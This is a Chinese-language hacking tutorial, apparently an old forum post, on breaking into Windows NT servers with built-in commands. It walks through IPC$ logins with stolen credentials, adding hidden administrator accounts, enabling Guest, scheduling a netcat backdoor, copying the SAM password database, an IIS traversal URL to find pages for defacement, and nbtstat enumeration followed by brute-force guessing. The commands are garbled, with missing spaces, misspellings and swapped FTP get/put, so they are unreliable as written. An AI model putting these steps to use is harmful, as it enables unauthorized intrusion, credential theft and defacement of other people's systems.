只要刪除這些就可以了有些系統NT裝置在D盤或其他盤,就要把C改成其他盤。
1NET
只要你擁有某IP用戶名和密碼,那就用IPC$做連接吧!
這裏我假如你得到用戶是hbx密碼是123456假設對方IP爲127.0.0.1
netus\\127.0.0.1\ipc$"123456"/user:"hbx"
退出的命令是
netus\\127.0.0.1\ipc$/delte
下面的操作你必需登陸後纔可以用.登陸的方法就在上面.
----------------------
下面我講怎麼創建一個用戶,由於SA 權限相當於系統的超級用戶.
加一個heibai用戶密碼爲lovechina
netuserheibailovechina/add
只要顯示命令勝利,那麼我可以把他加入Administr組了.
netlocalgroupA dministrheibai/add
----------------------
這裏是講映射對方的C盤,當然其他盤也可以,只要存在就行了.這裏把對方的C盤映射到外地的Z盤.
netusz:\\127.0.0.1\c$
----------------------
netstarttelnet
這樣可以打開對方的TELNET服務.
----------------------
這裏是將Guest用戶激活,guestNT默認用戶,而且無法刪除呢?不知道是否這樣,2000就是刪除不了
netuserguest/active:yes
----------------------
這裏是把一個用戶的密碼改掉,把guest密碼改爲lovechina其他用戶也可以的只要有權限就行了呀!
netuserguestlovechina
net命令果然強大啊!
2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了把木馬傳了上去,怎麼啓動他呢?
那麼需要用AT命令,這裏假設你已經登陸了那個服務器。
首先要得到對方的時間,
nettime\\127.0.0.1
將會返回一個時間,這裏假設時間爲12:1現在需要新建一個作業,其ID=1
at\\127.0.0.112:3nc.exe
這裏假設了一個木馬,名爲NC.EXE這個東西要在對方服務器上.
這裏介紹一下NCNCNETCA T簡稱,爲了方便輸入,一般會被改名.一個TELNET服務,端口爲99.
等到12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.
3:telnet
這個命令非常實用,可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的端口.
telnet127.0.0.199
這樣就可以連到對方的99端口.那你就可以在對方運行命令了這個也就是肉雞.
4:FTP
可以將你東西傳到對方機子上,可以去申請個支持FTP上傳的空間,國內多的如果真的找不到給個WWW.51.NET不錯的.當我申請完後,會給用戶名,密碼,以及FTP服務器.
上傳前需要登陸先,這裏我假設FTP服務器是WWW.51.NET用戶名是HUCJS密碼是654321
會要求輸入用戶,勝利後會要求輸入密碼.
下面先說上傳,假設你需上傳的文件是INDEX.HTM位於C:\下,傳到對方D:\
getc:\index.htmd:\
假設你要把對方C盤下的INDEX.HTM下到機子的D盤下
putc:\index.htmd:\
5:copy
下面我說說怎樣把本地的文件複製到對方硬盤上去,需要建立好IPC$連接纔有效。
這裏我把本地C盤下的index.htm複製到127.0.0.1C盤下
copiindex.htm\\127.0.0.1\c$\index.htm
----------------------
如果你要複製到D盤下把C改爲D就行了!
copiindex.htm\\127.0.0.1\d$\index.htm
----------------------
如果你要把他複製到WINNT目錄裏
就要把輸入
copiindex.htm\\127.0.0.1\admin$\index.htm
admin$winnt
----------------------
要把對方的文件複製過來,順便告訴大家NT備份的數據庫放在x:\winnt\repair\sam._sam._數據庫的文件名
下面就把127.0.0.1數據庫複製到外地C盤下
copi\\127.0.0.1\admin$\repair\sam._c:\
----------------------
6set
如果你跑進了一部機子,而且想黑他這思想只能在特別時候才準有)當然他80端口要開,不然你黑給誰看。這時需要用SET命令!
下面是得到結果!來分析它只是找主頁在那而已。
COMPUTERNA ME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GA TEWA Y_INTERFA CE=CGI/1.1
HTTP_A CCEPT=*/*
HTTP_A CCEPT_LA NGUA GE=zh-cn
HTTP_CONNECTION=Keep-A live
HTTP_HOST=當前登陸者的IP這裏原本是顯示我IP被我刪除了
HTTP_A CCEPT_ENCODING=gzipdeflate
HTTP_USER_A GENT=Mozilla/4.0compatible;MSIE5.0;Window98;DigExt
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PA THEXT=.COM;.EXE;.BA T;.CMD
PA TH_PA NSLA TED=E:\vlroot主頁放在地址,只要你看到PA TH_PA NSLA TED=後面就是主頁的存放地址。這裏是E:\vlroot
PROCESSOR_A RCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86Famili6Model3Step3GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_SPING=/c+set
REMOTE_A DDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NA ME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NA ME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWA RE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\DefaultUser
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址,這裏告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才幹100%找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到也面一模一樣,那麼這就是主頁的名稱了
7nbtstat
如果你掃到一部NT機子,136139其中一個端口開了話,就要用這個命令得到用戶了順便告訴大家這是netbio得到用戶名後就可以猜猜密碼了例如比較簡單的密碼,密碼和用戶名一樣的都試下,不行就暴力破解吧!